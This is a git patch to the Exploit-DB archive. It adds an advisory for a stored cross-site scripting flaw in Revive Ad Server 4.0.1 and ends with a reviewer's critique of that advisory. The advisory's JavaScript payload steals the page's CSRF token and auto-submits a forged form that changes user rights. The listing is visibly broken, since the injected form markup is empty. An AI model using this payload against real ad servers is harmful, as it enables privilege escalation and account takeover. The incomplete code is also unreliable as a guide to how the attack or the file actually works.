From 0278b1993d00996794f65e945b67e34f653d18a4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 27 Apr 2017 05:01:18 +0000 Subject: [PATCH] DB: 2017-04-27 1 new exploits Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery
---
 files.csv | 3 +-
 platforms/php/webapps/41939.txt | 63 +++++++++++++++++++++++++++++++++
 2 files changed, 65 insertions(+), 1 deletion(-)
 create mode 100755 platforms/php/webapps/41939.txt
diff --git a/files.csv b/files.csv
index 87c153afb..9d89d5072 100644
--- a/files.csv
+++ b/files.csv
@@ -4052,7 +4052,7 @@ id,file,description,date,author,platform,type,port
 32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0
 32194,platforms/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,multiple,dos,0
 32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,multiple,dos,0
-32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0
+32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0
 32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",multiple,dos,0
 32229,platforms/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos,0
 32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0
@@ -37788,3 +37788,4 @@ id,file,description,date,author,platform,type,port
 41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0
 41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
+41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
diff --git a/platforms/php/webapps/41939.txt b/platforms/php/webapps/41939.txt
new file mode 100755
index 000000000..6f62b39cc
--- /dev/null
+++ b/platforms/php/webapps/41939.txt
@@ -0,0 +1,63 @@
+---------------------------------------------------------------
+# Exploit Title: XSRF Stored Revive Ad Server 4.0.1
+# Date: 24/04/2017
+# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
+# Vendor Website : https://www.revive-adserver.com/
+# Software download : https://www.revive-adserver.com/download/
+# Version: 4.0.1
+# Tested on: Windows 7 x64 SP1 / Kali Linux
+
+
+Description :
+
+A vulnerability has been discovered in Revive Ad Server, which can be
+exploited by malicious people to conduct cross-site scripting attacks.
+When you create a banner using Generic HTML Banner, input
+
+passed via the 'htmltemplate' parameter to '/banner-edit.php' is not
+
+properly sanitised before being returned to the user (This is probably
+expected as it's an html banner). But, this can be exploited
+to execute arbitrary HTML and script code in a user's browser session in
+context of an affected site.
+
+
+This XSS vector allow to execute scripts to gather the CSRF token
+
+and submit a form to update user rights
+
+
+Here's the script :
+
+---------------------- Javascript-------------------------------
+
+var tok = document.getElementsByName('token')[0].value;
+
+var txt = '
'
+txt += ''
+txt += ''
+txt += ''
+txt += ''
+txt += ''
+txt += ''
+txt += '
'
+
+var d1 = document.getElementById('firstLevelContent');
+
+d1.insertAdjacentHTML('afterend', txt);
+
+document.getElementById("hacked").submit();
+
+
+---------------------- Javascript End-------------------------------
+
+(little trick to submit a form that has a "submit" parameter, just use a
+list "submit[]")
+
+This will update user rights and allow to manage accounts
+
+POC video : https://www.youtube.com/watch?v=wFuN-ADlJpM
+
+Patch : No patch yet
+
+---------------------------------------------------------------
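Review bot: The advisory never states which Revive role is required to create a Generic HTML banner nor which user has to load the stored banner for the script to run, so the real impact cannot be rated from this text — the script submits a form that changes user rights, which implies the victim is a higher-privileged account than the author, but that is only inferred. A header line after `# Tested on:` such as `# Prerequisites: an account allowed to create/edit HTML banners; a user with account-management rights must view the stored banner` would close that gap. The title says `XSRF Stored` while the body describes a stored XSS that reads the CSRF token and submits the form itself, so the CSRF protection is bypassed rather than missing, and since the text itself concedes that HTML in this field is expected, the defensive point is that user-supplied banner markup is rendered inside the administrative origin — restricting that capability to trusted roles or rendering previews from an isolated origin would be the usual mitigations, and `Patch : No patch yet` should carry a date or vendor reference. On this rendering the markup between the quotes in the `var txt = '…'` and `txt += '…'` lines is absent, presumably stripped during page extraction, so the listing as shown is incomplete and should not be read as the file's actual contents.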